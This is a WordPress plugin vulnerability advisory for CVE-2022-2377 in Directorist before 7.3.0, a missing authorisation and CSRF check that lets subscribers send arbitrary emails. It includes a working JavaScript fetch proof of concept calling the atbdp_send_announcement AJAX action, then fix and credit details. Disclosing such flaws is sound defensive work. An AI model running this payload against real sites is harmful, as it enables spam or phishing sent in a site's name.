Directorist < 7.3.0 – Subscriber+ Arbitrary E-mail Sending | CVE 2022-2377 | Plugin Vulnerabilities

Description

The plugin does not have authorisation and CSRF checks in an AJAX action, allowing any authenticated users to send arbitrary emails on behalf of the blog

Proof of Concept

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },

  "method": "POST",
  "body": "action=atbdp_send_announcement&recipient=anyone@b.com&subject=subject&message=content&send_to_email=1",
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

Affects Plugins

Fixed in 7.3.0

References

CVE

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website

https://kazet.cc/

Submitter twitter

Verified

Yes

WPVDB ID

f4e606e9-0664-42fb-a59b-21de306eb530

Timeline

Publicly Published

2022-07-26 (about 1 years ago)

Added

2022-07-26 (about 1 years ago)

Last Updated

2023-04-24 (about 1 years ago)

Other

Published

Title

Published

2024-04-22

Title

WP Club Manager < 2.2.12 - Missing Authorization

Published

2024-03-28

Title

Essential Blocks for Gutenberg < 4.4.10 - Missing Authorization

Published

2024-04-29

Title

LeadConnector < 1.8 - Missing Authorization to Unauthenticated Arbitrary Post Deletion

Published

2024-04-22

Title

SchedulePress < 5.0.9 - Missing Authorization

Published

2023-12-27

Title

WP MLM Unilevel <= 4.0 - Unauthenticated Privilege Escalation